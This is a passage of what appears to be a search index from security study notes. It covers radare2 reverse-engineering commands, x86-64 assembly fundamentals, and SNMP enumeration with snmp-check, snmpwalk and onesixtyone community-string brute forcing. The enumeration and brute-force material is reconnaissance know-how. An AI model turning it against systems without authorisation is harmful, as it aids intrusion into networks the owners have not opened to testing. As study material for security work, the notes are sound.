It uses short abbreviations for its commands - single letters - and many of its commands have subcommands which are also expressed as single letters. Luckily, you can always append a ? to a specific command in order to view its subcommands and what they do. To quit radare2, use the q command.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Introduction","id":"314","title":"Introduction"},"315":{"body":"You can load a binary by invoking the r2 command. You might sometimes need to also add the -e io.cache=true option in order to fix relocations in disassembly.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Loading a Binary","id":"315","title":"Loading a Binary"},"316":{"body":"aaa - analyse the binary afl - list the analysed functions axt - list all the places where a function is called. Note, you need to use the flag name that radare automatically creates for functions after aaa.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Analysis » Analysis","id":"316","title":"Analysis"},"317":{"body":"/ - search the bytes of the binary for a specific string /w - search for wide character strings like Unicode symbols","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Strings » Strings","id":"317","title":"Strings"},"318":{"body":"i - display file information ie - find the program's entry point iM - find the program's main function iz - pull the hard-coded strings from the executable (only the data sections), use izz to get the strings from the entire binary","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Binary Info » Binary Info","id":"318","title":"Binary Info"},"319":{"body":"Flags resemble bookmarks. They associate a name with a given offset in a file. 
Create a new flag f @ offset You can also remove a flag by appending - to the command: f- List available flags - f: Rename a flag fr ","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Flags","id":"319","title":"Flags"},"32":{"body":"snmp-check is a simple utility for basic SNMP enumeration. You only need to provide it with the IP address to enumerate: snmp-check [IP] Furthermore, you have the following command-line options: -p: Change the port to enumerate. Default is 161. -c: Change the community string to use. Default is public -v: Change the SNMP version to use. Default is v1. There are additional arguments that can be provided but these are the salient ones.","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » SNMP Enumeration using snmp-check","id":"32","title":"SNMP Enumeration using snmp-check"},"320":{"body":"Flag names should be unique for addressing reasons. However, it is often the case that you need to have simple and ubiquitous names like loop or return. For this purpose there exist the so-called \"local\" flags, which are tied to the function where they reside. It is possible to add them using the f. command:","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Local Flags","id":"320","title":"Local Flags"},"321":{"body":"Flags can be grouped into flag spaces - a flag space is a namespace for flags, grouping together similar flags. Some flag spaces include sections, registers, symbols. These are managed with the fs command. [0x00001080]> fs?\nUsage: fs [*] [+-][flagspace|addr] # Manage flagspaces\n| fs display flagspaces\n| fs* display flagspaces as r2 commands\n| fsj display flagspaces in JSON\n| fs * select all flagspaces\n| fs flagspace select flagspace or create if it doesn't exist\n| fs-flagspace remove flagspace\n| fs-* remove all flagspaces\n| fs+foo push previous flagspace and set\n| fs- pop to the previous flagspace\n| fs-. 
remove the current flagspace\n| fsq list flagspaces in quiet mode\n| fsm [addr] move flags at given address to the current flagspace\n| fss display flagspaces stack\n| fss* display flagspaces stack in r2 commands\n| fssj display flagspaces stack in JSON\n| fsr newname rename selected flagspace","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Flag Spaces","id":"321","title":"Flag Spaces"},"322":{"body":"Moving around the file requires the usage of the seek (s) command in order to change the offset at which we are. It takes one argument which is a mathematical expression capable of containing flag names, parentheses, addition, subtraction, multiplication of immediates or contents of memory using brackets. Examples: [0x00000000]> s 0x10\n[0x00000010]> s+4\n[0x00000014]> s-\n[0x00000010]> s+\n[0x00000014]> Here is a list of additional seeking commands: [0x00000000]> s?\nUsage: s # Help for the seek commands. See ?$? to see all variables\n| s Print current address\n| s.hexoff Seek honoring a base from core->offset\n| s:pad Print current address with N padded zeros (defaults to 8)\n| s addr Seek to address\n| s- Undo seek\n| s-* Reset undo seek history\n| s- n Seek n bytes backward\n| s--[n] Seek blocksize bytes backward (/=n)\n| s+ Redo seek\n| s+ n Seek n bytes forward\n| s++[n] Seek blocksize bytes forward (/=n)\n| s[j*=!] List undo seek history (JSON, =list, *r2, !=names, s==)\n| s/ DATA Search for next occurrence of 'DATA'\n| s/x 9091 Search for next occurrence of \\x90\\x91\n| sa [[+-]a] [asz] Seek asz (or bsize) aligned to addr\n| sb Seek aligned to bb start\n| sC[?] string Seek to comment matching given string\n| sf Seek to next function (f->addr+f->size)\n| sf function Seek to address of specified function\n| sf. Seek to the beginning of current function\n| sg/sG Seek begin (sg) or end (sG) of section or file\n| sl[?] 
[+-]line Seek to line\n| sn/sp ([nkey]) Seek to next/prev location, as specified by scr.nkey\n| so [N] Seek to N next opcode(s)\n| sr pc Seek to register\n| ss Seek silently (without adding an entry to the seek history) > 3s++ ; 3 times block-seeking\n> s 10+0x80 ; seek at 0x80+10","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Seeking » Seeking","id":"322","title":"Seeking"},"323":{"body":"","breadcrumbs":"Reverse Engineering » Assembly Programming » Introduction","id":"323","title":"Introduction"},"324":{"body":"","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Introduction","id":"324","title":"Introduction"},"325":{"body":"Variables in assembly do not exist in the same sense as they do in higher-level programming languages. This is especially true of local variables such as those inside functions. Instead of allocating space for a particular value and having that place be \"named\" according to a variable, the compiler may use a combination of stack and heap allocations as well as registers to achieve behaviour resembling a variable. That being said, there are some parallels with higher-level programming languages as well. When manually programming assembly, it should be noted that variable names are more or less identical to addresses.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Introduction","id":"325","title":"Introduction"},"326":{"body":"Assembly constants cannot be changed during run-time execution. Their value is substituted at assembly-time (corresponding to compile-time substitution for constants in higher-level languages). Consequently, constants are not even assigned a location in memory, for they turn into hard-coded values. 
Defining constants in assembly is done in the following way: equ For example, EXAMPLE equ 0xdeadbeef","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Constants","id":"326","title":"Constants"},"327":{"body":"Static or global variables which are initialised before the programme executes are stored in the .data section. In order to define such a variable, you must give it a name, data size and value. In contrast with constants, such data can be mutated during run-time. The following data size declarations can be used: Declaration Size (in bits) Type db 8 dw 16 dd 32 dq 64 ddq 128 Integer dt 128 Floating-Point The syntax for declaring such variables is as follows: For example: byteVar db 0x1A ; byte variable","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Static Initialised Data","id":"327","title":"Static Initialised Data"},"328":{"body":"Static uninitialised data is stored in the .bss section. The syntax for allocating such variables is as follows: Such variables are usually allocated as chunks, hence the required count. The primary data types are as follows: Declaration Size (in bits) resb 8 resw 16 resd 32 resq 64 resdq 128 Some examples: bArr resb 10 ; 10 element byte array wArr resw 50 ; 50 element word array dArr resd 100 ; 100 element double array qArr resq 200 ; 200 element quad array","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Static Uninitialised Data","id":"328","title":"Static Uninitialised Data"},"329":{"body":"Data representation refers to the way that values are stored in a computer. For technical reasons, computers do not use the familiar base-10 number system but rather avail themselves of the base-2 (binary) system. 
Under this paradigm, numbers are represented as 1's and 0's.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Introduction","id":"329","title":"Introduction"},"33":{"body":"snmpwalk is a much more versatile tool for SNMP enumeration. Its syntax is mostly the same as snmp-check:","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » SNMP Enumeration using snmpwalk","id":"33","title":"SNMP Enumeration using snmpwalk"},"330":{"body":"When storing an integer value, there are two ways to represent it - signed and unsigned - depending on whether the value should be entirely non-negative or may also have a \"-\" sign. Based on the number of bits used for storing a value, the value may have a different range. Size Range Size Unsigned Range Signed Range Byte (8 bits) 2^8 [0..255] [−128..+127] Word (16 bits) 2^16 [0..65,535] [−32,768..+32,767] Doubleword (32 bits) 2^32 [0..4,294,967,295] [−2,147,483,648..+2,147,483,647] Quadword (64 bits) 2^64 [0..2^64−1] [−2^63..+2^63−1] Double Quadword (128 bits) 2^128 [0..2^128−1] [−2^127..+2^127−1] Unsigned integers are represented in their typical binary form.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Integer Representation","id":"330","title":"Integer Representation"},"331":{"body":"Signed integers are represented using two's complement. To obtain the negative of a number in two's complement, negate all of its bits and add 1 to the result. A corollary of this representation is that it adds no complexity to the addition and subtraction operations.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Two's Complement","id":"331","title":"Two's Complement"},"332":{"body":"Addressing modes refer to the supported methods for accessing and manipulating data. 
There are three basic addressing modes in x86-64: register, immediate and memory.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Introduction","id":"332","title":"Introduction"},"333":{"body":"In register mode addressing, the operand is a register ( brain undergoing nuclear-fission ). mov rax, rbx The value inside rbx is copied to rax.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Register Mode Addressing","id":"333","title":"Register Mode Addressing"},"334":{"body":"In immediate mode addressing, the operand is an immediate value, or a literal . These are simply constant values such as 10, 0xfa3, \"lol\", and so on. mov rax, 123 The number 123 is copied into rax.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Immediate Mode Addressing","id":"334","title":"Immediate Mode Addressing"},"335":{"body":"In memory mode addressing, the operand is treated as a memory location. This is referred to as indirection or dereferencing and is similar to how pointers can be dereferenced in C/C++. In assembly, this is done by wrapping the operand in square brackets: []. So for example, rax refers to the value stored within the register rax. However, [rax] means \"treat rax like a pointer and use the value it points to\". Essentially, [rax] treats the value inside the register as an address and uses that address to find the actual value it needs. mov DWORD PTR [rax], 0xdeadbeef The value 0xdeadbeef is copied into the location pointed to by rax. Since memory is byte-addressable, it is oftentimes required to specify how many bytes we want to access. 
This is done by prepending one of the following specifiers to the operand: Specifier Number of Bytes BYTE PTR / byte 1 WORD PTR / word 2 DWORD PTR / dword 4 QWORD PTR / qword 8 Moreover, the actual formula for memory addressing is a bit more complicated, since it was developed mainly for making the implementation of arrays easier. [baseAddr + (indexReg * scaleValue) + offset] The baseAddr must be a register or variable name, although it may be omitted in which case the address is relative to the beginning of the data segment. indexReg is a register which contains an index into the array and the scaleValue is the size (in bytes) of a single member of the array. The offset must be an immediate value. mov eax, dword [ebx] ; move into eax the value which ebx points to\nmov rax, QWORD PTR [rbx + rsi] ; move into rax the value which (rbx + rsi) points to\nmov rcx, qword [rax+(rsi*8)] ; move into rcx the value which (rax + (rsi*8)) points to","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Memory Mode Addressing","id":"335","title":"Memory Mode Addressing"},"336":{"body":"Memory is nothing more than a series of bytes which can be individually addressed. When storing values which are larger than a single byte, the bytes under the x86-64 paradigm are stored in little-endian order - the least significant byte (LSB) at the lowest memory address and the most significant byte (MSB) at the highest memory address. For example, the variable var = 0xDEADBEEF would be represented in memory as follows: Note how the right-most byte is at a lower address and the addresses for the rest of the bytes increase as we go right-to-left.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Memory » Endianness","id":"336","title":"Endianness"},"337":{"body":"Below is the general memory layout of a programme: The reserved section is unavailable to user programmes. 
The .text section stores the instructions which comprise the programme's code. Static variables which were declared and given a value at assemble-time are stored in the .data section. The .bss section stores static uninitialised data, i.e. variables which were declared but were not provided with an initial value. If such variables are used before they are initialised, their value will be meaningless. The Stack and the Heap are where data can be allocated at run-time. The Stack is used for allocating space for small amounts of data with a size known at compile-time and grows from higher to lower addresses. Conversely, the Heap allows for the dynamic allocation of space for data of size known at run-time and grows from lower to higher addresses.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Memory » Memory Layout","id":"337","title":"Memory Layout"},"338":{"body":"Registers are value containers which reside on the CPU (separately from RAM). They are small in size and some have special purposes. x86-64 assembly operates with 16 general-purpose registers (GPRs). It should be noted that the 8-byte (r) variants do not exist in 32-bit mode. 64-bit Register Lower 4 Bytes Lower 2 Bytes Lower 1 Byte rbp ebp bp bpl rsp esp sp spl rip eip rax eax ax al rbx ebx bx bl rcx ecx cx cl rdx edx dx dl rsi esi si sil rdi edi di dil r8 r8d r8w r8b r9 r9d r9w r9b r10 r10d r10w r10b r11 r11d r11w r11b r12 r12d r12w r12b r13 r13d r13w r13b r14 r14d r14w r14b r15 r15d r15w r15b Each row contains names which refer to different parts of the same register. Note, the lower 16 bits of the rip register (instruction pointer) are inaccessible on their own. For example, the rax register could be set to the following: rax = 0x0000 000AB 10CA 07F0 The name eax would then only refer to the part of the rax register which contains 10CA 07F0. Similarly, ax would represent 07F0, and al would be just F0. 
Additionally, the upper byte of ax, bx, cx and dx may be separately accessed by means of the ah, bh, ch and dh monikers, which exist for legacy reasons.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Introduction","id":"338","title":"Introduction"},"339":{"body":"Not all registers available in the x86-64 paradigm are created equal. Certain registers are reserved for specific purposes, despite being called general-purpose.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Register Specialisation","id":"339","title":"Register Specialisation"},"34":{"body":"Notwithstanding its age, onesixtyone is a good tool which allows you to bruteforce community strings by specifying a file instead of a single string with its -c option. Its syntax is rather simple:","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » Bruteforce community strings with onesixtyone","id":"34","title":"Bruteforce community strings with onesixtyone"},"340":{"body":"The stack pointer rsp (esp for 32-bit machines) is used to point to the current top of the stack and should not be used for any purpose other than in instructions which involve stack manipulation.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Stack Pointer rsp","id":"340","title":"The Stack Pointer rsp"},"341":{"body":"The base pointer rbp (ebp for 32-bit machines) is the twin brother of the stack pointer and is used as a base pointer when calling functions. It points to the beginning of the current function's stack frame. Interestingly enough, its use is actually gratuitous because compilers can manage the stack frames of functions equally well without a separate base pointer. 
It is mostly used to make assembly code more comprehensible for humans.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Base Pointer rbp","id":"341","title":"The Base Pointer rbp"},"342":{"body":"The instruction pointer rip (eip for 32-bit machines) points to the next instruction to be executed. It is paramount not to get confused when using a debugger, since the rip does not actually point to the instruction currently being executed.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Instruction Pointer rip","id":"342","title":"The Instruction Pointer rip"},"343":{"body":"The flag register rFlags (eFlags for 32-bit machines) is an isolated register which is automatically updated by the CPU after every instruction and is not directly accessible by programmes. Following is a table of the meaning assigned to different bits of this register. Note that only the lower 32 bits are used even on 64-bit machines. Name Symbol Bit Usage =1 =0 Carry CF 0 Indicates whether the previous operation resulted in a carry-over. CY (Carry) CN (No Carry) 1 Reserved. Always set to 1 for eFlags. Parity PF 2 Indicates whether the least significant byte of the previous instruction's result has an even number of 1's. PE (Parity Even) PO (Parity Odd) 3 Reserved. Auxiliary Carry AF 4 Used to support binary-coded decimal operations. AC (Auxiliary Carry) NA (No Auxiliary Carry) 5 Reserved. Zero ZF 6 Indicates whether the previous operation resulted in a zero. ZR (Zero) NZ (Not Zero) Sign SF 7 Indicates whether the most significant bit was set to 1 in the previous operation (implies a negative result in signed-data contexts). NG (Negative) PL (Positive) Trap TF 8 Used by debuggers when single-stepping through a programme. Interrupt Enable IF 9 Indicates whether or not the CPU should immediately respond to maskable hardware interrupts. 
EI (Enable Interrupt) DI (Disable Interrupt) Direction DF 10 Indicates the direction in which several bytes of data should be copied from one location to another. DN (Down) UP (Up) Overflow OF 11 Indicates whether the previous operation resulted in an integer overflow. OV (Overflow) NV (No Overflow) I/O Privilege Level IOPL 12-13 Nested Task NT 14 Mode MD 15 Resume RF 16 Virtual 8086 Mode VM 17 31-63 Reserved.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Flag Register rFlags","id":"343","title":"The Flag Register rFlags"},"344":{"body":"In addition to the aforementioned registers, the x86-64 paradigm includes 16 registers, xmm[0-15], which are used for 32- and 64-bit floating-point operations. Furthermore, the same registers are used to support the Streaming SIMD Extensions (SSE) which allow for the execution of Single Instruction Multiple Data (SIMD) instructions.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Floating-Point Registers and SSE","id":"344","title":"Floating-Point Registers and SSE"},"345":{"body":"The x86-64 assembly paradigm has a large number of different instructions at its disposal. An instruction consists of an operation and a set of operands, where the latter specify the data and the former specifies what is to be done to that data.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Instruction Set » Introduction","id":"345","title":"Introduction"},"346":{"body":"Typically, instruction signatures are represented using the following operand notation. Operand Notation Description Register operand. , , , Register operand with a specific size requirement. Source operand. Destination operand - this may be a register or memory location. Floating-point destination register operand. Immediate value (a literal). Base-10 by default, but can be preceded with 0x to make it hexadecimal. Memory location - a variable name or an address. 
Arbitrary operand - immediate value, register or memory location.